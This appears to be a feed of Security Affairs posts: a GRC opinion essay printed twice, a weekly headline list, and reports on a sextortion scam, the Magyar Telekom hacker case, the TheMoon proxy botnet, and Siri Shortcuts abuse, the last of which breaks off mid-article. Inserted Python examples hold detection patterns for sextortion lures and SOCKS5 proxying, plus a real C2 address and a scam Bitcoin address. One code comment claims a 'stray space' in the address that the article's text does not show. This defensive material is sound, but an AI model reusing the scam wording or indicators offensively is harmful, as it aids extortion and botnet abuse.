The need of the hour in the organization is to identify and mitigate the risks that will seriously inhibit the growth of the business. Any business is run with a governance framework and various industry regulatory compliance requirements. Any issue in corporate governance or compliance leads to an increase in risk…Hence a platform is required whose purpose is to reduce the risk in the organization. A GRC Automation platform or an Integrated Risk Management solution serves the purpose!

Just food for thought…Even bad code can function…but it will be disastrous! Hence it’s imperative to have a well-thought-out coding governance structure for creating good coding practice…similarly, in the corporate governance environment, GRC programs create a good structure and are critical for managing your cybersecurity risk…even though manual processes seem to be working efficiently!

Governance, Risk and Compliance (GRC) is about managing your enterprise data effectively, but with data come its security and privacy concerns too. So why not think of outsourcing or transferring the risk?…well, not a good idea! Enterprises can outsource cyber security, but not risk. Risk will always be within your organization. Hence you need to contain your risk…by continuously monitoring your enterprise data. So now the challenge is managing your in-house data! (yes, data, the buzz word…”whoever controls the data…controls the world!”)

To securely house the data we need to identify which is the most critical information or PII (personally identifiable information) to be protected, or what policy needs to be crafted that will protect the compliance of the various controls that are applied to the identified risks! The GDPR, for example, has introduced comprehensive checks and deterrents to protect EU citizens’ data. One thing to remember is that these data protection laws are not about protecting data but ultimately about people! (remember Article 17, the ‘right to be forgotten’, in GDPR)

Also with digital transformation and internet proliferation cyber frauds and crime will only increase! Which means the threat to people and their privacy would always increase!

So where do we start?

The starting point is always the internal policies or external regulations that guard the organizational boundaries or in social life the human rights! These policies are the key to governance or success of the entire GRC Program in an organization. Policies define the boundaries which would act as the perimeter defence which needs to be continuously monitored. Policies not only help govern a nation but also govern an enterprise.

Once an appropriate policy is created, we need to ensure that implementation of the policy is managed and any non-compliance with these policies is tracked to closure according to the risk appetite. This standardization can be achieved through a platform called GRC!

But there are many challenges in GRC adoption…even after more than a decade of GRC presence, I still hear incoherent objections from clients.

Three major objections are as follows:

  1. Why shift to automation when current manual process is efficient enough?
  2. We only want Audit Management Automation so why invest in Integrated Risk Management or GRC solution?
  3. Internal teams consume the GRC features very little in day-to-day activities, which means adoption by the internal risk or compliance team itself is low. So how do we change this behaviour? (I faced this with one of the world’s biggest stock exchanges)

The challenge is the adoption rate of the GRC platform…many think it’s an added cost and hence continue with the manual process…only to create more risk in their organization, which keeps piling up!

To add to this with various automation products, document management platforms available, the GRC purpose is lost a bit among the chaos…

Hence I feel it’s time to create a larger awareness campaign for GRC… I call it ‘The GRC Movement’

If you look at the world’s biggest historical events (be it the Martin Luther King, Jr. Civil Rights movement, Mahatma Gandhi’s Satyagraha or non-cooperation movement, or the invention of the Printing Press), they were primarily triggered by a mass movement. Every global movement had a common goal to achieve…this collective purpose is missing in the GRC space today.

Source: AFP/Getty Images / Pic Courtesy: Wikimedia Commons / https://www.pinterest.com/pin/803048177275425019/

Why are social movements important in the world…because the collective actions of a social movement play an important role in bringing social change, and because there was a need for the movement: a common message was not articulated or there was a lack of direction. Similarly, there is a need for creating a GRC movement in the enterprises. This movement will bring about a risk culture change which will ensure every process in the enterprise is standardized and optimized. This would ultimately be demonstrated by a reduction in the count of risks in the organization.

I feel we can create a GRC movement in 3 simple ways:

Organizations need a better approach to tackle cybersecurity and risk! I propose an approach with a 360 degree view to make a GRC Movement happen.

This 360 degree GRC movement can be achieved using three aspects, as follows:

GRC for Enterprise (Contextual)

Are the applications or use cases of GRC platforms or products for enterprises going to be different for different organisations? If yes, then what kind of use cases? They might not be different, but they would be architected, developed or configured differently.

Example: Every traffic signal has 3 alert lights globally, but the traffic model in India is different from the US, Australia or Europe (parameters like traffic density, road width, peak time etc. are all different for the various economies), and similarly autonomous driving in China and Germany might be different…

When a new technology or workflow is developed…you need to renegotiate the policy…because there is no single right way of doing it, but multiple wrong ways of doing it.

Example: what if a new camera comes along that sees through walls? You would want to renegotiate your corporate privacy policy! It’s a continuous improvement cycle.

The true value of a GRC technology for the end users or stakeholders is in its user experience. The comfort with which the users can create reports, dashboards or conduct a risk assessment would be the key for the enterprise. This would decide the adoption rate and consumption rate of the GRC solution within the enterprise users.

Innovation itself doesn’t hurt users…users are hurt because change happens and the user experience changes!

So what’s your ‘GRC for Enterprise’ vision?

GRC of Enterprise (Ownership)

The organization goes through complete chaos if the risk process is handled manually…hence if you digitise risk…then you have more control over your data, which leads to more visibility!

As the GRC platform of the enterprise matures, it becomes the protected property or IP of the organization…it’s too risky for any organization to handle governance & compliance aspects or tasks manually…as even a single missed event or incident can bring the organization down financially. The enterprise needs to be alert 24×7, but the hackers need to get in just once! The risk or compliance team within the enterprise knows the genesis of every problem, and only they can solve it, using automation to reduce effort and manual error for long-term gains.

Privacy and accountability of the data in the GRC tool…is a critical aspect, hence compliance with regulations like GDPR would be key for a successful GRC journey! Without mapping the controls to the policy or corporate objective, to check which policy violation has happened, the core purpose of an integrated GRC platform will never be achieved! This mapping is what leads to accountability in the org!

All executives and senior leadership should have more knowledge of the regulations in their industry as all their actions are linked to the risk and compliance of their enterprise.

Simply training employees would not be enough, hence it’s crucial to consistently take ahead the process maturity and standardization achieved through the GRC platform. Revisiting the various workflows, KPIs and metrics and fine-tuning them to suit the ever-changing cyber world is key!

The GRC platform for an already established and mature organization would be different compared to a newly formed organization.

For this, the GRC management would need to have a VC vs. PE mindset, depending on the organizational maturity.

A Venture Capitalist would take a start-up and grow it exponentially…a PE firm will take an already established company and grow it multi-fold.

So what’s your ‘GRC of Enterprise’ vision?

GRC by Enterprise (Contribution)

How can enterprises contribute to the GRC field…how do we as an entire ecosystem develop GRC talent and skills in an enterprise…

Can a unique problem in the enterprise be solved by a unique workflow configured by an enterprise…which could be a case study for the industry to learn from!

Has there been an increase in the use of the GRC platform for risk and compliance records after the enhancement of the user experience? The GRC group within the enterprise can contribute their learnings to the external world…

In the GRC space every organization hunts for the best practices implemented by other organizations, but this data is not publicly available, as many hesitate to share information. Hence I believe there is a need for a global social contract for our information security economy! Just as climate change can be dealt with through policy changes globally. Also, we need to remember that no policy is written in stone, as evolution needs to happen! So a common database of best practices in GRC is the need of the hour!

The success of the GRC movement would lie in its adoption by all parties simultaneously. It’s in everyone’s interest to collaborate and share success stories with other enterprises, without which the GRC solution will soon be outdated! Let the world know your uniqueness and let others learn from your innovation. Let others build the platform further, which would be the true spirit of collaboration!

So what’s your ‘GRC by Enterprise’ vision?

Hence, for a successful GRC Program an organization needs to have a GRC vision which comprises all 3 dimensions above.

This will create a GRC Democracy!

Note: Opinions expressed are solely my own and do not express the views or opinions of my employer.

Author: Deric Karunesudas is currently working with RSA (Cyber Security division of Dell) handling the presales for GRC Archer for SEA and SAARC Market. He is a Cybersecurity Evangelist and a GRC Architect.

Starting his consulting career with Deloitte, he is a seasoned Cyber security & Privacy professional with end-to-end experience of delivery, sales and presales. He has managed various markets like the US, Europe and the Middle East in his previous avatar.

His proposal paper on “Internet of Things” was selected for ISF Copenhagen World congress Nov 2014 and Atlanta World Congress 2015.

He is a technology enthusiast and has keen interest in Entrepreneurship. Deric believes in the power of Cloud, Blockchain & data-driven disruption!

Twitter – @thisisderic

Pierluigi Paganini

(SecurityAffairs – GRC, cybersecurity)

The post Can Enterprises execute a GRC Movement? appeared first on Security Affairs.



Security Affairs

Can Enterprises execute a GRC Movement?

Managed security services or security operations, cloud security, GRC is one of the fastest growing solutions in the world.

The only place I can say more risk = more gain would be in the entrepreneurship space…because in the enterprise cyber security kingdom, it is just the opposite! So let me explain…

Before I start, stating some facts: – Global IT spend according to Gartner is 3.7 Trillion in 2018, and Cyber security market is 150 Billion which makes cyber security 4% of the total IT industry and growing at 10% CAGR …of all the various solutions under cyber security like Identity & Access, Application security, Network security, Managed security services or security operations, cloud security, GRC is one of the fastest growing solutions in the world.
Ref: https://www.gartner.com/en/information-technology/insights/cybersecurity Ref: https://www.statista.com/statistics/595182/worldwide-security-as-a-service-market-size/

GRC GLOBAL CYBER SECURITY MARKET
GLOBAL CYBER SECURITY MARKET

Ref: https://www.statista.com/statistics/595182/worldwide-security-as-a-service-market-size/

The need of the hour in the organization is the identify and mitigate risks that will seriously prohibit the growth of the business. Any business is run with governance framework and various industry regulatory compliance. Any issue in corporate governance or compliance leads to increase in risk…Hence a Platform is required whose purpose is to reduce the risk in the organization. GRC Automation platform or an Integrated Risk Management solution serves the purpose!

Just a food for thought…Even a bad code can function…but it will be disastrous! Hence it’s imperative to have a well thought coding governance structure for creating a good coding practice…similarly in the corporate governance environment, GRC programs create a good structure and are critical for managing your cybersecurity risk…even though manual processes seem to be working efficiently!

Governance Risk and Compliance (GRC) is about managing your enterprise data effectively but with data comes its security and privacy concerns too. So why not think of outsourcing or transferring the risk?…well not a good idea! Enterprises can outsource cyber security, but not risk. Risk will always be within your organization. Hence you need to contain your risk…by continuously monitoring your enterprise data. So now the challenge in managing your inhouse data! (yes data the buzz word…”whoever controls the data ..controls the world!”)

To securely house the data we need to identify which is the most critical information or PII (personally identifiable information) to be protected or what policy needs to be crafted that will protect the compliance of the various controls that are applied on the identified risks! Like the GDPR Law has shown comprehensive checks and deterrents to protect the EU citizen data. One thing to remember is that these data protection laws are not about protecting data but ultimately about people! (remember Article 17 ‘right to be forgotten’ in GDPR)

Also with digital transformation and internet proliferation cyber frauds and crime will only increase! Which means the threat to people and their privacy would always increase!

So where do we start?

The starting point is always the internal policies or external regulations that guard the organizational boundaries, or, in social life, human rights! These policies are the key to the governance and success of the entire GRC program in an organization. Policies define the boundaries, which act as the perimeter defence that needs to be continuously monitored. Policies not only help govern a nation but also govern an enterprise.

Once an appropriate policy is created, we need to ensure that implementation of the policy is managed and any non-compliance with these policies is tracked to closure according to the risk appetite. This standardization can be achieved through a platform called GRC!

But there are many challenges in GRC adoption… even after more than a decade of GRC presence, I still hear incoherent objections from clients.

The 3 major objections are as follows:

  1. Why shift to automation when the current manual process is efficient enough?
  2. We only want audit management automation, so why invest in an Integrated Risk Management or GRC solution?
  3. The internal team's use of GRC features in day-to-day activities is very low, which means adoption by the internal risk or compliance team itself is low. So how do we change this behaviour? (I faced this with one of the world's biggest stock exchanges.)

The challenge is the adoption rate of the GRC platform… many think it's an added cost and hence continue with manual processes… only to create more risk in their organization, which keeps piling up!

To add to this, with the various automation products and document management platforms available, the purpose of GRC gets a bit lost in the chaos…

Hence I feel it's time to create a larger awareness campaign for GRC… I call it 'The GRC Movement'.

If you look at the world's biggest historical events (be it Martin Luther King, Jr.'s Civil Rights movement, Mahatma Gandhi's Satyagraha or non-cooperation movement, or the invention of the printing press), they were primarily triggered by a mass movement. Every global movement had a common goal to achieve… this collective purpose is missing in the GRC space today.

GRC

Source: AFP/Getty Images / Pic Courtesy: Wikimedia Commons / https://www.pinterest.com/pin/803048177275425019/

Why are social movements important in the world? Because the collective actions of a social movement play an important role in bringing social change, and also because there was a need for the movement, since a common message was not articulated or there was a lack of direction. Similarly, there is a need to create a GRC movement in enterprises. This movement will bring about a risk culture change which will ensure every process in the enterprise is standardized and optimized. This would ultimately be demonstrated by a reduction in the count of risks in the organization.

I feel we can create a GRC movement in 3 simple ways:

Organizations need a better approach to tackling cybersecurity and risk! I propose an approach with a 360-degree view to make a GRC Movement happen.

This 360-degree GRC movement can be achieved using the three aspects that follow:

GRC for Enterprise (Contextual)

Are the applications or use cases of GRC platforms or products going to be different for different organisations? If yes, then what kind of use cases? They might not be different, but they would be architected, developed or configured differently.

Example: every traffic signal globally has 3 alert lights, but the traffic model in India is different from the US, Australia or Europe (parameters like traffic density, road width, peak time etc. all differ between economies), and similarly autonomous driving in China and Germany might be different…

When a new technology or workflow is developed… you need to renegotiate the policy… because there is no single right way of doing it but multiple wrong ways of doing it.

Example: what if a new camera appears that sees through walls? You would want to renegotiate your corporate privacy policy! It's a continuous improvement cycle.

The true value of a GRC technology for end users or stakeholders is in its user experience. The ease with which users can create reports and dashboards or conduct a risk assessment is the key for the enterprise. This decides the adoption rate and consumption rate of the GRC solution among the enterprise's users.

Innovation itself doesn't hurt users… users are hurt because change happens and the user experience changes!

So what’s your ‘GRC for Enterprise’ vision?

GRC of Enterprise (Ownership)

The organization goes through complete chaos if the risk process is handled manually… hence if you digitise risk… you have more control over your data, which leads to more visibility!

As the GRC platform of the enterprise matures, it becomes the protected property or IP of the organization… it's too risky for any organization to handle governance & compliance aspects or tasks manually… as even a single missed event or incident can bring the organization down financially. Enterprises need to be alert 24×7, but the hackers need to get in just once! The risk or compliance team within the enterprise knows the genesis of every problem, and only they can solve it, using automation to reduce effort and manual error for long-term gains.

Privacy and accountability of the data in the GRC tool… is a critical aspect, hence compliance with regulations like GDPR is key for a successful GRC journey! Without mapping the controls to the policy or corporate objective, to check which policy violation has happened, the core purpose of an integrated GRC platform will never be achieved! Doing so leads to accountability in the organization!

All executives and senior leadership should have more knowledge of the regulations in their industry, as all their actions are linked to the risk and compliance of their enterprise.

Simply training employees would not be enough, hence it's crucial to consistently advance the process maturity and standardization achieved through the GRC platform. Revisiting the various workflows, KPIs and metrics and fine-tuning them to suit the ever-changing cyber world is the key!

A GRC platform for an already established and mature organization would be different compared to one for a newly formed organization.

For this, GRC management would need to have a VC vs. PE mindset depending on organizational maturity.

A venture capitalist takes a start-up and grows it exponentially… a private equity firm takes an already established company and grows it multi-fold.

So what’s your ‘GRC of Enterprise’ vision?

GRC by Enterprise (Contribution)

How can enterprises contribute to the GRC field? How do we, as an entire ecosystem, develop GRC talent and skills in an enterprise?

Can a unique problem in the enterprise be solved by a unique workflow configured by the enterprise, which could become a case study for the industry to learn from?

Has there been an increase in the adoption of the GRC platform for risk and compliance records after the enhancement of the user experience? The GRC group within the enterprise can share its learnings with the external world…

In the GRC space every organization hunts for the best practices implemented by other organizations, but this data is not publicly available, as many hesitate to share information. Hence I believe there is a need for a global social contract for our information security economy, just as climate change can be dealt with through global policy changes. We also need to remember that no policy is written in stone, as evolution needs to happen! So a common database of best practices in GRC is the need of the hour!

The success of the GRC movement lies in its adoption by all parties simultaneously. It's in everyone's interest to collaborate and share success stories with other enterprises, without which the GRC solution will soon be outdated! Let the world know your uniqueness and let others learn from your innovation. Let others build the platform further, which would be the true spirit of collaboration!

So what’s your ‘GRC by Enterprise’ vision?

Hence, for a successful GRC program, an organization needs to have a GRC vision that comprises all 3 dimensions above.

This will create a GRC Democracy!

Note: Opinions expressed are solely my own and do not express the views or opinions of my employer.

Author: Deric Karunesudas is currently working with RSA (Cyber Security division of Dell) handling the presales for GRC Archer for SEA and SAARC Market. He is a Cybersecurity Evangelist and a GRC Architect.

Starting his consulting career with Deloitte, he is a seasoned cyber security & privacy professional with end-to-end experience of delivery, sales and presales. He has managed various markets like the US, Europe and the Middle East in his previous avatar.

His proposal paper on “Internet of Things” was selected for ISF Copenhagen World congress Nov 2014 and Atlanta World Congress 2015.

He is a technology enthusiast and has keen interest in Entrepreneurship. Deric believes in the power of Cloud, Blockchain & data-driven disruption!

Twitter – @thisisderic

Pierluigi Paganini

(SecurityAffairs – GRC, cybersecurity)

The post Can Enterprises execute a GRC Movement? appeared first on Security Affairs.

Security Affairs newsletter Round 199 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Using steganography to obfuscate PDF exploits
Aztarna – the open-source scanning tool for vulnerable robots
Cobalt cybercrime gang abused Google App Engine in recent attacks
Dailymotion forces password reset in response to credential stuffing Attack
Hackers are targeting Cisco RV320/RV325, over 9K routers exposed online
Hackers compromise WordPress sites via Zero-Day flaws in Total Donations plugin
Authorities shut down XDEDIC marketplace in an international operation
Disable FaceTime, a bug lets you hear a person's audio before he answers
Law enforcement worldwide hunting users of DDoS-for-Hire services
Netanyahu accuses Iran of cyber attacks carried out daily
US DoJ charges Huawei sanctions violations and in technology espionage
Facebook paid teens $20 to install a Research App that spies on them
Iran-Linked APT39 group use off-the-shelf tools to steal data
Reading the ENISA Threat Landscape Report 2018
Skyscanner launches a public bug bounty program
Sofacy's Zepakab Downloader Spotted In-The-Wild
Airbus data breach exposes some employees' data
CookieMiner Mac Malware steals browser cookies and sensitive Data
Exclusive: spreading CSV Malware via Google Sheets
Imperva mitigated DDoS attack generated 500 Million Packets per Second, the largest ever
Researchers published the PoC exploit code for Linux SystemD bugs
Facebook dismantled a vast manipulation campaign tied to Iran
State Bank of India left archive with millions of Customer messages exposed
The return of the AdvisorsBot malware
US authorities aim to dismantle North Korea's Joanap Botnet
Apple issued a partial fix for recent FaceTime spying bug
Home Design website Houzz suffered a data breach
IBM experts warn of malicious abuses of Apple Siri Shortcuts
Operators of the TheMoon botnet offer it as a service

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 199 – News of the week appeared first on Security Affairs.

Experts observed a new sextortion scam Xvideos-themed

A sextortion scam campaign attempts to trick victims into believing that the adult site Xvideos.com was hacked and that crooks recorded its visitors.

The creativity of cybercriminals is inexhaustible: a new variant of the sextortion scam has appeared in the threat landscape. This campaign attempts to trick victims into believing that the popular adult site Xvideos.com was hacked and that crooks used a malicious script to record visitors through their webcam.

In a classic social engineering scam, the emails sent to the victims inform them that hackers have stolen their data and contacts; the messages include a user's old password obtained from third-party data breaches. Hackers threaten to publish the stolen material and the alleged videos if the victims do not pay $969 worth of Bitcoin.

“This variant of the sextortion scam has been under way for about a month now, but we first learned about last night when a reader contacted us to see if it was real.” reads a blog post published by BleepingComputer. “Like previous variants, this scam email includes a user’s old password obtained from data breaches and threatens to send videos of the recipients in compromising activities unless they send the attackers a bitcoin payment of $969.”

This is the first time that experts have observed attackers using the news of a hacked adult site as bait.

BleepingComputer also published the full text of the messages used in this sextortion campaign.

"xxx is your pass. Lets get straight to purpose. Neither anyone has paid me to check about you. You do not know me and you are most likely wondering why you are getting this e-mail?" reads the message sent to the victims.

"Well, i setup a software on the X video clips (porn material) web site and you know what, you visited this site to have fun (you know what i mean). When you were watching videos, your browser began functioning as a RDP with a key logger which gave me access to your display and also web camera. after that, my software program gathered all your contacts from your Messenger, FB, as well as emailaccount. Next i made a double-screen video. 1st part displays the video you were viewing (you've got a good taste lol . . .), and 2nd part shows the recording of your web camera, yeah its you." 

Sextortion scam

Is the campaign effective?

To answer that, we have to check the balances of the bitcoin addresses included in the emails used by the scammers.

One of the addresses, 18z5c6TjLUosqPTEnm6q7Q2EVNgbCy16Td, used in this sextortion scam since early January 2019, has received approximately 0.95 bitcoins ($3,200).
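Pulling the payment address out of a message like this is the first step of the check described above, and the address is also the one indicator worth tracking across campaigns. As an added example (not code from Security Affairs or BleepingComputer), the following Python triage script extracts the legacy Bitcoin address and the demanded dollar amount from a constructed message modelled on the quoted text, verifies the address's Base58Check checksum so that a garbled or mistyped address is not chased as an IoC, and scores the usual lures (old password, webcam claim, keylogger/RDP claim, crypto payment, deadline). Looking up the balance, as the article does, would be an extra query to a block explorer that the script does not make; SAMPLE_EMAIL is constructed.

```python
"""Sextortion e-mail triage: extract the payment address and demanded amount,
validate the address checksum, and score the classic lures.

Added example, not code from the article or from BleepingComputer.
SAMPLE_EMAIL is constructed, modelled on the message quoted in the article."""
import hashlib
import re

SAMPLE_EMAIL = """\
xxx is your pass. Lets get straight to purpose. Neither anyone has paid me to check about you.
When you were watching videos, your browser began functioning as a RDP with a key logger
which gave me access to your display and also web camera.
You have 48 hours. Pay $969 in bitcoin to: 18z5c6TjLUosqPTEnm6q7Q2EVNgbCy16Td
"""

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Legacy (P2PKH / P2SH) addresses: leading 1 or 3, Base58 alphabet, 26-35 chars.
BTC_ADDR_RE = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")
USD_RE = re.compile(r"\$\s?(\d{1,3}(?:,\d{3})+|\d+)")

# Lures seen in this family of scams; each hit adds one point to the score.
INDICATORS = {
    "password_lure": re.compile(r"\bis your pass(?:word)?\b", re.I),
    "webcam_claim": re.compile(r"\bweb ?cam(?:era)?\b", re.I),
    "keylogger_or_rdp": re.compile(r"\b(?:key ?logger|rdp)\b", re.I),
    "crypto_payment": re.compile(r"\bbitcoin\b", re.I),
    "deadline": re.compile(r"\b\d{1,3} ?hours?\b", re.I),
}


def b58decode(s: str) -> bytes:
    """Decode Base58 to bytes; each leading '1' stands for a 0x00 byte."""
    n = 0
    for ch in s:
        n = n * 58 + B58_ALPHABET.index(ch)  # ValueError on a non-alphabet char
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading_ones = len(s) - len(s.lstrip("1"))
    return b"\x00" * leading_ones + body


def is_valid_base58check(addr: str) -> bool:
    """True if the trailing 4-byte checksum (double SHA-256) matches the payload."""
    if not 26 <= len(addr) <= 35 or any(c not in B58_ALPHABET for c in addr):
        return False
    raw = b58decode(addr)
    if len(raw) != 25:  # 1 version byte + 20-byte hash + 4-byte checksum
        return False
    payload, checksum = raw[:21], raw[21:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


def extract_btc_addresses(text: str) -> list:
    return BTC_ADDR_RE.findall(text)


def extract_usd_amount(text: str):
    m = USD_RE.search(text)
    return int(m.group(1).replace(",", "")) if m else None


def triage(email: str) -> dict:
    """Summarise the extortion indicators found in one message."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(email)]
    addrs = extract_btc_addresses(email)
    return {
        "indicators": hits,
        "score": len(hits),
        "addresses": addrs,
        # An address with a bad checksum is a typo or a decoy, not an IoC worth tracking.
        "checksum_ok": {a: is_valid_base58check(a) for a in addrs},
        "usd_amount": extract_usd_amount(email),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_EMAIL).items():
        print(f"{key}: {value}")
```

The checksum step matters more than it looks: scam kits and copy-paste reporting both mangle addresses, and a defanged or truncated address that fails Base58Check should be flagged for a human rather than loaded into a watchlist. Bech32 (`bc1…`) addresses use a different checksum and are deliberately not covered here.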

Unfortunately, sextortion scams are very profitable for crooks: they are very easy and cheap to arrange, and the associated risks are very low.

Other variants of sextortion trick victims into installing malicious attachments that allow crooks to deliver data stealers and ransomware.

Pierluigi Paganini

(SecurityAffairs – cybercrime, spam)

The post Experts observed a new sextortion scam Xvideos-themed appeared first on Security Affairs.

Hacker who reported a flaw in Hungarian Magyar Telekom faces up to 8-years in jail

Hungarian police arrested a young hacker because he discovered and exploited serious vulnerabilities in the systems of Magyar Telekom.

What are the risks for a hacker who decides to publicly disclose a vulnerability?

The case I'm going to discuss shows us the legal implications of this conduct.

Last year, Hungarian law enforcement arrested a young hacker (20) because he discovered and exploited serious vulnerabilities in the systems of Magyar Telekom, the major Hungarian telecommunications company.

Now the hacker is facing up to 8 years in prison.

According to the local media, in April 2018 the hacker found a serious security vulnerability in the website of the telco company, and he exploited the issue to penetrate the telecommunications network.

The Hungarian youngster first reported the flaw to the company, which invited him to a meeting to discuss the possibility of letting him test its systems.

The boy went to Budapest for the meeting, but the company did not permit him to conduct further tests on its systems.

Magyar Telekom hack

However, the young hacker continued testing the Magyar Telekom networks and discovered another severe flaw in May. This second vulnerability could have allowed an attacker to access all public and retail mobile and data traffic, and monitor the servers of the firm.

“Negotiations were stalled, but the programmer continued to search for a more serious vulnerability that could allow access to all public and retail mobile and data traffic.” reported the Napi.hu website. 

“However, this was spotted by Telekom’s people, which Andras also noticed, and then abandoned testing. Telekom, on the other hand, filed a complaint for his action, and in three weeks, the police also appeared to him – recalls the HCLU.”

The activity of the hacker was detected by the experts at Magyar Telekom, who reported the unauthorized intrusion to the police, who then arrested him.

The man is currently on trial and the Hungarian Prosecution Service has requested a prison sentence. The non-profit human rights watchdog Hungarian Civil Liberties Union is defending the boy. The Prosecutor's Office argues that the action of the boy posed a serious risk to society.

“The prosecutor’s office offered Andras a bargain that if he admitted his guilt, he would only receive a 2-year suspended prison, but if he did not avail himself of it, he would be sentenced to 5 years of download. All this, according to HCLU, the court did not see any evidence.” continues the local media.

The young hacker refused the plea deal, and worse, prosecutors have added other charges to the indictment, such as disrupting the operation of a "public utility."

Due to the new charges, the boy now risks a sentence of up to 8 years if found guilty.

Pierluigi Paganini

(SecurityAffairs – Magyar Telekom, hacking)

The post Hacker who reported a flaw in Hungarian Magyar Telekom faces up to 8-years in jail appeared first on Security Affairs.

Operators of the TheMoon botnet offer it as a service

Researchers at the CenturyLink Threat Research Labs discovered that the operators of the TheMoon IoT botnet are offering it as a service.

Experts at the CenturyLink Threat Research Labs observed a new evolution of the TheMoon IoT botnet: its operators added a previously undocumented module that allows them to offer it under a malware-as-a-service model.

The activity of the TheMoon botnet was first spotted in 2014, and since 2017 its operators have added at least 6 IoT device exploits to the code of the bot. The botnet targets broadband modems or routers from several vendors, including Linksys, ASUS, MikroTik, D-Link, and GPON routers.

In May 2018, researchers from security firm Qihoo 360 Netlab reported that cybercriminals targeting the Dasan GPON routers were using another zero-day flaw affecting the same routers to recruit them into their botnet.

Now CenturyLink Threat Research Labs has collected evidence that the botnet's operator has sold this proxy botnet as a service to other cybercrime gangs, which were using it for credential brute forcing, video advertisement fraud, general traffic obfuscation and more.

Experts noticed several devices performing credential brute force attacks on multiple popular websites, and then uncovered a C2 operating at 91[.]215[.]158[.]118. This address had been associated with a previous TheMoon campaign.

Experts uncovered a video ad fraud operator using TheMoon on a single server that received requests for 19,000 unique URLs on 2,700 unique domains over a six-hour period.

The new module was deployed on MIPS devices and allows operators to abuse infected devices as SOCKS5 proxies and to offer a network proxy as a service.

CenturyLink blocked TheMoon infrastructure on its ISP network and reported its findings to other network owners of potentially infected devices.

TheMoon botnet

Further details including IoCs are reported in the analysis published by CenturyLink.
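Two things in this report are directly actionable for a network owner: the C2 address, and the fact that an infected CPE device starts answering SOCKS5 handshakes for strangers. As an added example (not CenturyLink's or the article's code), the Python script below refangs the C2 indicator exactly as it is printed above (including the stray space) and runs two checks over constructed flow records from a home router: any flow to the C2 address, and a completed SOCKS5 greeting/method exchange (RFC 1928) between a host outside the LAN and the router's WAN address, which is what a router turned into a proxy-for-hire looks like on the wire. ROUTER_WAN, the LAN prefix and the FLOWS records are constructed.

```python
"""Flow-record checks for a home router suspected of TheMoon infection.

Added example, not code from CenturyLink or the article. The C2 address is the
one quoted in the article; ROUTER_WAN, LAN and FLOWS are constructed."""
import ipaddress

DEFANGED_C2 = "91[.]215[.] 158[.]118"        # as printed in the article, stray space included
ROUTER_WAN = "203.0.113.10"                   # constructed, RFC 5737 documentation range
LAN = ipaddress.ip_network("192.168.1.0/24")  # constructed home LAN prefix


def refang(ioc: str) -> str:
    """Turn a defanged IPv4 indicator back into dotted-quad form and validate it."""
    addr = ioc.replace("[.]", ".").replace("(.)", ".").replace(" ", "")
    return str(ipaddress.IPv4Address(addr))  # raises ValueError if not an IPv4 address


C2_ADDRESSES = {refang(DEFANGED_C2)}


def is_socks5_greeting(payload: bytes) -> bool:
    """RFC 1928 client greeting: VER=0x05, NMETHODS, then exactly NMETHODS method bytes."""
    return len(payload) >= 3 and payload[0] == 0x05 and len(payload) == 2 + payload[1]


def is_socks5_method_reply(payload: bytes) -> bool:
    """RFC 1928 server choice: VER=0x05 followed by the selected method byte."""
    return len(payload) == 2 and payload[0] == 0x05


# Constructed flow records with the first client bytes (c2s) and first server bytes (s2c).
FLOWS = [
    # router reaches out to the published C2
    {"src": ROUTER_WAN, "dst": "91.215.158.118", "dport": 80,
     "c2s": b"GET /", "s2c": b"HTTP/1.1 200"},
    # an Internet host completes a SOCKS5 handshake against the router's WAN side
    {"src": "198.51.100.7", "dst": ROUTER_WAN, "dport": 8080,
     "c2s": b"\x05\x01\x00", "s2c": b"\x05\x00"},
    # ordinary outbound TLS, should not alert
    {"src": ROUTER_WAN, "dst": "198.51.100.20", "dport": 443,
     "c2s": b"\x16\x03\x01", "s2c": b"\x16\x03\x03"},
    # a LAN client using the router as a proxy: not an exposure, should not alert
    {"src": "192.168.1.23", "dst": ROUTER_WAN, "dport": 8080,
     "c2s": b"\x05\x01\x00", "s2c": b"\x05\x00"},
]


def detect(flows):
    """Return (rule, src, dst) tuples for flows matching either rule."""
    alerts = []
    for f in flows:
        src = ipaddress.ip_address(f["src"])
        # Rule 1: any traffic to the published C2 address.
        if f["dst"] in C2_ADDRESSES:
            alerts.append(("known_themoon_c2", f["src"], f["dst"]))
        # Rule 2: a host outside the LAN completes a SOCKS5 handshake with the
        # router's WAN address, i.e. the CPE is serving as somebody's proxy.
        if (f["dst"] == ROUTER_WAN and src not in LAN
                and is_socks5_greeting(f["c2s"]) and is_socks5_method_reply(f["s2c"])):
            alerts.append(("socks5_proxy_exposed_on_wan", f["src"], f["dst"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(FLOWS):
        print(alert)
```

Inside versus outside is decided against the configured LAN prefix rather than with `ipaddress`'s `is_private`/`is_global`, because those also class carrier-grade NAT and documentation ranges as non-global and would silently drop real Internet clients from rule 2.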

Pierluigi Paganini

(SecurityAffairs – TheMoon botnet, hacking)

The post Operators of the TheMoon botnet offer it as a service appeared first on Security Affairs.

IBM experts warn of malicious abuses of Apple Siri Shortcuts

IBM’s security researchers demonstrated that the Siri Shortcuts introduced in the Apple iOS 12 can be abused by attackers.

Apple implemented Siri Shortcuts in iOS 12 to allow users to rapidly access applications and features; shortcuts can automate common tasks and can be integrated by third-party developers into their software.

Researchers at IBM Managed Security Services discovered that Siri Shortcuts can be abused by hackers to perform malicious activities.

“This new feature can be enabled via third-party developers in their apps, or custom built by users downloading the shortcuts app from the app store. Once downloaded and installed, the Shortcuts app grants the power of scripting to perform complex tasks on users’ personal devices.” reads the analysis published by IBM.

“But accessing the phone from Siri Shortcuts also presents some potential security risks that were discovered by X-Force IRIS and reported to Apple’s security team.”

Experts pointed out that Siri Shortcuts improve interactions between users and the device; they allow access directly from the lock screen or through existing apps. Users can also share Shortcuts from the apps via iCloud.

